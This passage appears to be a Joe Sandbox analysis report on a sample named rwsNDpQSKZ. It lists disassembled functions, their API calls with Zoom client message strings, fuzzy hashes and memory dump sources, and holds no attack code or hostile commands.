                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type,00000004), ref: 00C92C27
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName,Type), ref: 00C92C64
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId), ref: 00C92C94
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94), ref: 00C92D0E
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify), ref: 00C92D2B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000054,00C72BDB,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,strMsg,strUserId,strUserName,Type,com.zoom.app.cci.ccivideo.onlivetranscriptmsgreceived.notify,00009E94,strMsg,strUserId,strUserName), ref: 00C92D3E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 1a5b9a668f464e888585f7b4883aa56a02964675fc8934087e1f5016bd9aa28b
                • Instruction ID: e9872fe0860b732ee239eeec6f53e5f57e21d848a360ee116c240379a50dc2b6
                • Opcode Fuzzy Hash: 1a5b9a668f464e888585f7b4883aa56a02964675fc8934087e1f5016bd9aa28b
                • Instruction Fuzzy Hash: 0D41AE75E003199FCF14EFA4C8496DDBBB0BF49315F004118EC12AB391DB309A8ADBA9
                Function 00C8A2E1 Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8A2E8
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url,path,userData,00000004), ref: 00C8A314
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url,path,userData,00000004), ref: 00C8A342
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url,path,userData,00000004), ref: 00C8A37F
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url,path,userData), ref: 00C8A3AF
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url), ref: 00C8A41B
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748), ref: 00C8A438
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000050,00C6B1B1,com.Zoom.app.pt.meetingImageDownloaded,url,path,userData,com.Zoom.app.pt.meetingImageDownloaded,00002748,url,path,userData,00000004), ref: 00C8A44B
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 850266bdb2f241239a1e0012e2248ed58b558a1910da0c4c00f789c205cb1db6
                • Instruction ID: af5352021dbd735688d21fd341dece16e7d2db805d96019ec95e1c54982a3a03
                • Opcode Fuzzy Hash: 850266bdb2f241239a1e0012e2248ed58b558a1910da0c4c00f789c205cb1db6
                • Instruction Fuzzy Hash: 2F41B174D017189FCF14EFA4D8496DDBBB4AF48315F004119EC12AB391DB70AA4ADFAA
                Function 00C8AC9D Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8ACA4
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type,index,file_id,00000004), ref: 00C8ACD0
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type,index,file_id,00000004), ref: 00C8ACFE
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type,index,file_id,00000004), ref: 00C8AD3B
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type,index,file_id), ref: 00C8AD6B
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type), ref: 00C8ADD7
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2), ref: 00C8ADF4
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000050,00C6B6E1,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,type,index,file_id,com.Zoom.app.conf.custom3DAvatar.uptoweb.remove,000027A2,type,index,file_id,00000004), ref: 00C8AE07
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 6056aa6dc357765cf093a4cad35c615f998e13e542150dc8a01633ff9cdf1536
                • Instruction ID: 207dfa98f6dfb512bf6e831b5e0248ce0f6bd129dc94bce49c1c8aacbb06a918
                • Opcode Fuzzy Hash: 6056aa6dc357765cf093a4cad35c615f998e13e542150dc8a01633ff9cdf1536
                • Instruction Fuzzy Hash: F7419075D002199FCF14EFA4C8456DEBBB4AF08315F04411AEC12AB391DF709A8ADBA9
                Function 00C8EC56 Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8EC5D
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8EC89
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8ECB7
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8ECF4
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName), ref: 00C8ED24
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID), ref: 00C8ED90
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8), ref: 00C8EDAD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8EDC0
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 6b5d3a34aac4b2a135ed0f55da0df0cc26ff8fb4841bdf7339aed951b48c96de
                • Instruction ID: f0878327ab7a095599d04159ea41fc2471eca91732fd8d0a1f1fdd3ace32d575
                • Opcode Fuzzy Hash: 6b5d3a34aac4b2a135ed0f55da0df0cc26ff8fb4841bdf7339aed951b48c96de
                • Instruction Fuzzy Hash: A6419C75E003099FCF14EFA4D8456DDBBB0AF48315F044119EC12AB391DB70AA8ADBA9
                Function 00C8A50D Relevance: 12.1, APIs: 8, Instructions: 111COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8A514
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A53A
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A568
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5A5
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5D5
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download), ref: 00C8A633
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index), ref: 00C8A650
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A663
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 425e00cd3f60ccbd1de29320b29965b622ac1482f5b435ffcff3265dbb17b1d4
                • Instruction ID: 086b40580d0a3fe55375da3e00366b0082e20c1dffa65f4840e64f3009323dcd
                • Opcode Fuzzy Hash: 425e00cd3f60ccbd1de29320b29965b622ac1482f5b435ffcff3265dbb17b1d4
                • Instruction Fuzzy Hash: 9141AE75D00608DFCF14EFA4D945ADDBBB4AF08315F044119E812A7395EB309A8ADBA9
                Function 00C90AF2 Relevance: 12.1, APIs: 8, Instructions: 111COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90AF9
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B1F
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B4D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B8A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90BBA
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response), ref: 00C90C18
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID), ref: 00C90C35
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90C48
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: e313330a1652eb35b117d1cd93ae4efe56f6fcca535a2e25949a10405ff427f0
                • Instruction ID: f19abb71748aa3157f4f13ee0adb0223b610c6bdcb8a0f462f10e58f85a99597
                • Opcode Fuzzy Hash: e313330a1652eb35b117d1cd93ae4efe56f6fcca535a2e25949a10405ff427f0
                • Instruction Fuzzy Hash: A2419C75D00208DFCF14EFA4D949ADDBBB4BF08315F144219E812AB381DB309A8ADBA5
                Function 00D0E4E1 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON
                Download Yara Rule
                APIs
                • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D0E68B,00000000), ref: 00D0E505
                • HeapAlloc.KERNEL32(00000000), ref: 00D0E50C
                  • Part of subcall function 00D0E5D7: IsProcessorFeaturePresent.KERNEL32(0000000C,00D0E4F3,00000000,?,00D0E68B,00000000), ref: 00D0E5D9
                • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00D0E68B,00000000), ref: 00D0E51C
                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00D0E543
                • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 00D0E557
                • InterlockedPopEntrySList.KERNEL32(00000000), ref: 00D0E56A
                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D0E57D
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                • String ID:
                • API String ID: 2460949444-0
                • Opcode ID: 91e98d50225d0d8adc1a83a61332da3badba6e3aff11c0ea569e1d14b88488b2
                • Instruction ID: b043b2331f4fe021dd393f8ebbb8c58d318a88a7a3b955e4bc0f9679b25ef135
                • Opcode Fuzzy Hash: 91e98d50225d0d8adc1a83a61332da3badba6e3aff11c0ea569e1d14b88488b2
                • Instruction Fuzzy Hash: 321182B1640711BBD7215769AC4CFBA77AAEF44799F184C21F949E63D0EF60CC018AB4
                Function 00C60173 Relevance: 10.6, APIs: 7, Instructions: 138COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C6017D
                  • Part of subcall function 00C60601: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?), ref: 00C60619
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,?,00000000,?), ref: 00C601F5
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00D22BE0,00000000,00000000,?), ref: 00C60242
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000), ref: 00C60272
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,000003FE,?), ref: 00C602EF
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00D34CD0), ref: 00C60333
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?), ref: 00C6035C
                  • Part of subcall function 00C53EF0: ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,000000FF,?,00C53DA1,00000000), ref: 00C53F06
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                  • Part of subcall function 00C605E8: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00C5E6F0), ref: 00C605F7
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
